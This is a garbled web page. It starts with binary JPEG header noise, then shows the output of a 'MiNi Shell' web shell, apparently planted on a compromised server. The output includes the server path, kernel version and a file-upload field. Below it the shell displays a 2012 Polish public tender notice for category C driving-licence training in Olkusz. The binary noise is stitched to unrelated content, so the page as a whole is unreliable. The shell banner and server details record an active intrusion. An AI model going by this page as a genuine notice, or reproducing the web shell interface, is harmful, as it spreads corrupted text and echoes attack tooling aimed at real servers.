JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120620/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120620/210968-N-2012.html

<p class="kh_header"><b>Olkusz: Zorganizowanie i przeprowadzenie usługi szkolenia w zakresie Prawa jazdy kat. C dla 15 - to osobowej grupy  w ramach środków Funduszu Pracy</b><br>
<b>Numer ogłoszenia: 210968 - 2012; data zamieszczenia: 20.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Minkiewicza 2, 32-300 Olkusz, woj. małopolskie, tel. 032 6434348, faks 032 6430538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-olkusz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie usługi szkolenia w zakresie Prawa jazdy kat. C dla 15 - to osobowej grupy  w ramach środków Funduszu Pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia  jest zorganizowanie i przeprowadzenie usługi szkolenia w zakresie Prawa jazdy kat. C dla 15 - to osobowej grupy w ramach środków Funduszu Pracy.
Liczebność grupy skierowanej przez Powiatowy Urząd Pracy w Olkuszu nie może być zwiększona o osoby z wolnego naboru.
2. Zamówienie ma być przeprowadzone zgodnie z programem szkolenia, który powinien być dostosowany odpowiednio do identyfikowalnego na rynku pracy zapotrzebowania na kwalifikacje.
3. Wykonawca w celu podnoszenia jakości prowadzonego szkolenia zapewnia wysoką jakość oferowanego programu oraz nadzór wewnętrzny.
4. Program szkolenia winien być opracowany zgodnie z Rozporządzeniem Ministra Pracy i Polityki  Społecznej  z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy /Dz. U.  Nr 177, poz. 1193 wraz z późniejszymi zmianami/ i powinien zawierać w szczególności:
1) nazwę i zakres szkolenia,
2) czas trwania i sposób organizacji szkolenia,
3) wymagania wstępne  dla uczestników szkolenia,
4) cele szkolenia,
5) plan nauczania  określający  tematy  zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem  w miarę potrzeby, części teoretycznej i części praktycznej,
6) opis treści  szkolenia  w zakresie poszczególnych zajęć edukacyjnych,
7) sposób organizacji zajęć praktycznych  określonych w programie szkolenia,
8) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
9) przewidziane sprawdziany i egzaminy.
5. Szkolenie osób ubiegających się o wydanie uprawnienia do kierowania pojazdami kat. C, musi być przeprowadzone w zakresie i wymiarze wynikającym z programu szkolenia kandydatów na kierowców stanowiącym Załącznik nr 3 do Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217 poz. 1834 z późniejszymi zmianami).
6. Celem szkolenia jest przygotowanie osób do kierowania pojazdami samochodowymi w sposób nie zagrażający bezpieczeństwu i porządkowi ruchu drogowego oraz przygotowanie do złożenia Egzaminu Państwowego w Wojewódzkim Ośrodku  Ruchu Drogowego z prawa jazdy kat C. 
7. Program szkolenia oraz sposób organizacji zajęć praktycznych określonych w programie  powinien być tak  skonstruowany aby zapewnić jak najwyższą jakość szkolenia oraz profesjonalne przygotowanie  uczestników.
8. Program szkolenia  ma zawierać co najmniej co najmniej 50 godzin  na jednego kursanta w tym :
- dla zajęć teoretycznych nie może być mniejsza niż 20 godz. (godzina szkolenia  teoretycznego równa się 45 minutom), 
- dla zajęć praktycznych nie może być mniejsza niż 30 godz. (godzina szkolenia  praktycznego równa się 60 minutom).
Ponadto Wykonawca zobowiązany jest do przeprowadzenia egzaminu wewnętrznego na zasadach określonych  w Rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217 poz. 1834 z późniejszymi zmianami).
9. Wymaga się prowadzenia dla każdego uczestnika szkolenia  Karty  przeprowadzonych zajęć  zgodnie ze wzorem stanowiącym załącznik nr 2 do Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005r./Dz. U. Nr 217 poz.1834 z późn. zmianami/.
10. Po zakończeniu szkolenia Wykonawca zobowiązany jest przeprowadzić egzamin wewnętrzny, potwierdzający zdobytą wiedzę teoretyczną i praktyczną, a następnie wydać zaświadczenia o ukończeniu szkolenia zgodnie ze wzorem stanowiącym załącznik nr 4 do Rozporządzenia  Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217, poz.1834 z późn. zmianami).
11. Wykonawca dostosuje  kwalifikacje i doświadczenie kadry dydaktycznej do zakresu szkolenia.
12. Szkolenie musi być zorganizowane i przeprowadzone na terenie województwa małopolskiego lub województwa śląskiego. Odległość z miejscowości gdzie zostanie przeprowadzone szkolenie do   miejscowości będącej siedzibą Zamawiającego nie może przekroczyć 50 km i istnieje bezpośrednie   połączenie ( autobusem, busem lub pociągiem ) z miejscowości gdzie zostanie przeprowadzone szkolenie do miejscowości będącej siedzibą Zamawiającego.
13. Wykonawca dostosuje wyposażenie dydaktyczne i pomieszczenia do potrzeb szkolenia, z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia oraz przepisów p. poż.
14. Wykonawca zobowiązany jest zapewnić warunki lokalowe, plac manewrowy i wyposażenie dydaktyczne   
zgodnie z Rozporządzeniem   Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217, poz.1834 z późn. zmianami).
15. Każdemu z uczestników szkolenia powinny być przekazane nieodpłatnie materiały biurowe i szkoleniowe typu:
a) zeszyt,
b) długopis,
c) skrypty,
d) materiały do ćwiczeń.
Materiały szkoleniowe przekazywane  uczestnikom szkolenia powinny być adekwatne do treści szkolenia. Materiały wykorzystywane podczas realizacji szkolenia powinny być przekazywane uczestnikom szkolenia na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć. 
Po zakończeniu szkolenia materiały dydaktyczne przechodzą na własność uczestników szkolenia.
16. Wymaga się prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
a) dziennik zajęć edukacyjnych zawierający tematy i wymiar godzin  zajęć edukacyjnych oraz listę obecności zawierającą : imię i nazwisko i podpis uczestnika szkolenia, 
b) protokół  i karty oceny z okresowych sprawdzianów efektów kształcenia oraz egzaminu wewnętrznego,             
c) rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji zawierający: numer, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, oraz nazwę szkolenia i datę wydania zaświadczenia.
17.  Uczestnicy szkolenia powinni być objęci opieką z ramienia instytucji szkoleniowej. Każde szkolenie powinno mieć swojego opiekuna, osobę odpowiedzialną za organizację i realizację szkolenia, wskazaną do kontaktu w umowie  stanowiącej załącznik nr 10a  do SIWZ.
18. Wykonawca jest zobowiązany do sprawdzania efektów szkolenia na poszczególnych jego etapach wybranymi przez siebie metodami, w tym poprzez egzamin wewnętrzny.
19 . W ramach udzielonego zamówienia Wykonawca zobowiązany jest do wydania uczestnikom szkolenia:
1) zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji zgodnie  z  Rozporządzeniem  Ministra Pracy  i  Polityki  Społecznej  z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U.  Nr 177, poz. 1193 wraz z późniejszymi zmianami) zawierającego :
a)  numer z rejestru, 
b)  imię i nazwisko oraz numer PESEL uczestnika szkolenia a w  przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość,
c)  nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
d)  formę i nazwę szkolenia,
e)  okres trwania szkolenia,
f)  miejsce i datę wydania zaświadczenia 
g)  tematy i wymiar godzin zajęć edukacyjnych,
h)  podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie oraz nazwę szkolenia i datę wydania zaświadczenia
oraz
2) zaświadczenia o ukończeniu szkolenia zgodnie ze wzorem stanowiącym załącznik nr 4 do Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217, poz.1834 z późn. zmianami).
20. Zamawiający nie dopuszcza możliwości prowadzenia szkolenia metodą  e- learning.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia, określonego w specyfikacji mogą ubiegać się Wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania tj. a) posiadają aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez właściwy Wojewódzki Urząd Pracy, zgodnie z art. 20  ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r. Nr 69 poz. 415 z późn. zm.) i Rozporządzeniem MG i P z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 236 poz. 2365 z późn. zmianami),  b) posiadają wpis do rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców prowadzonego przez właściwego miejscowo starostę, zgodnie ze wzorem  stanowiącym Załącznik nr 2 do Rozporządzenia Ministra Infrastruktury z dnia 7 września 2004 r. w sprawie  wzoru wniosku o wpis do rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców oraz wzoru zaświadczenia potwierdzającego wpis przedsiębiorcy do tego rejestru (Dz. U. z 2004r.  Nr 205, poz. 2097 z późn. zmianami). Ocena spełnienia warunku dokonana zostanie zgodnie z formułą  spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI w SIWZ. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy  z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia, określonego w specyfikacji mogą ubiegać się Wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące posiadania wiedzy i doświadczenia tj.  wykażą się przeprowadzeniem z należytą starannością co najmniej jednego szkolenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - o tematyce tożsamej z przedmiotem zamówienia tzn. należy uwzględnić  tylko  szkolenia Prawo jazdy kat. C. Ocena spełnienia warunku dokonana zostanie zgodnie z formułą  spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI w SIWZ. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy  z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia, określonego w specyfikacji mogą ubiegać się Wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia tj. Wykonawca będzie dysponował co najmniej: 1) 2  pojazdami dla kat C: a) dopuszczonymi do ruchu, b) przystosowanymi do nauki jazdy, c)  spełniającymi wymagania określone w przepisach w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia.
Instruktor w trakcie zajęć praktycznych może szkolić wyłącznie jedną osobę. 
Wymagane jest, aby warunki techniczne jakimi dysponuje wykonawca tj. posiadane pojazdy były zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami instruktorów i egzaminatorów (Dz. U. z 2005r.  Nr 217 poz. 1834 z  późn. zmianami). 2)  jednym komputerem lub jednym laptopem;
3)   jednym projektorem multimedialnym. 
Jeżeli w wykazie (Załącznik nr 12 do SIWZ) Wykonawca wskaże potencjał techniczny należący do innych podmiotów, którym będzie dysponował, zobowiązany jest  do przedstawienia pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych do realizacji zamówienia zasobów, na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia warunku dokonana zostanie zgodnie z formułą  spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI w SIWZ. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy  z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia, określonego w specyfikacji mogą ubiegać się Wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące  dysponowania osobami zdolnymi do wykonania zamówienia, tj: 1) osobami, z których każda musi posiadać co najmniej: wykształcenie średnie oraz uprawnienia do szkolenia kandydatów na kierowców w zakresie prawa jazdy kat. C i legitymującymi się co najmniej rocznym stażem pracy z  zakresu wykonywanych czynności w niniejszym zamówieniu, 2)osobami posiadającymi  uprawnienia lekarza systemu lub pielęgniarki systemu lub ratownika medycznego oraz posiadającymi co najmniej roczny staż pracy w zakresie czynności wykonywanych w niniejszym zamówieniu. Jeżeli w wykazie (Załącznik nr 6 do SIWZ) Wykonawca wskaże osoby, którymi będzie dysponował, zobowiązany jest do przedstawienia pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnych do realizacji zamówienia osób, na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia warunku dokonana zostanie zgodnie z formułą  spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI w SIWZ. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy  z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia, określonego w specyfikacji mogą ubiegać się Wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące sytuacji ekonomicznej i finansowej. Ocena spełnienia warunku dokonana zostanie zgodnie z formułą  spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI w SIWZ. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy  z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.III.4.1) W celu wykazania posiadania uprawnień do wykonywania określonej działalności Wykonawca zobowiązany jest złożyć : 1) Oświadczenie o aktualnym wpisie do rejestru instytucji szkoleniowych z podaniem numeru ewidencyjnego, prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy  z dnia 20 kwietnia 2004r.o promocji zatrudnienia  i instytucjach rynku pracy i  Rozporządzeniem MG i P z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych / Dz. U nr 236 poz. 2364 i 2365 z późn. zmianami/  zgodnie ze wzorem stanowiącym załącznik  nr 14 do SIWZ. Oświadczenie powinno być przedstawione w formie oryginału i podpisane przez Wykonawcę lub osobę upoważnioną do podpisania oferty.
2) Oświadczenie o wpisie przedsiębiorcy do rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców prowadzonego przez właściwego miejscowo starostę, zgodnie ze wzorem  stanowiącym załącznik nr 2 do Rozporządzenia Ministra Infrastruktury z dnia 7 września 2004r. w sprawie wzoru wniosku o wpis do rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców oraz wzoru zaświadczenia potwierdzającego wpis  przedsiębiorcy do tego rejestru /Dz. U. z 2004r. Nr 205, poz.2097 z późn. zmianami/ - zgodnie  z  załącznikiem nr  15 do SIWZ. Oświadczenie powinno być przedstawione w formie oryginału i podpisane przez Wykonawcę lub osobę upoważnioną do podpisania oferty. 2.III. 4.2) W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą Pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne stanowiące załącznik nr 9 SIWZ, przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną do podpisania oferty. Zamawiający może żądać na wniosek okazania w/ w dokumentów w ciągu 14 dni. W przypadku zażądania przez Zamawiającego w/w dokumentów winny one być  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.3.III.4.3).  W przypadku kiedy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej należy złożyć zamiast dokumentów, o którym mowa w pkt 2.2 i pkt  2.3 dokumenty zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r.  w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane ( Dz. U. z 2009r. Nr 226 poz. 1817) tj. jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 1) SIWZ zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Daty wystawienia stosuje się odpowiednio. Jeżeli dokumenty wyżej wymienione Wykonawca składa  w języku obcym, należy również złożyć tłumaczenie na język polski, poświadczone przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
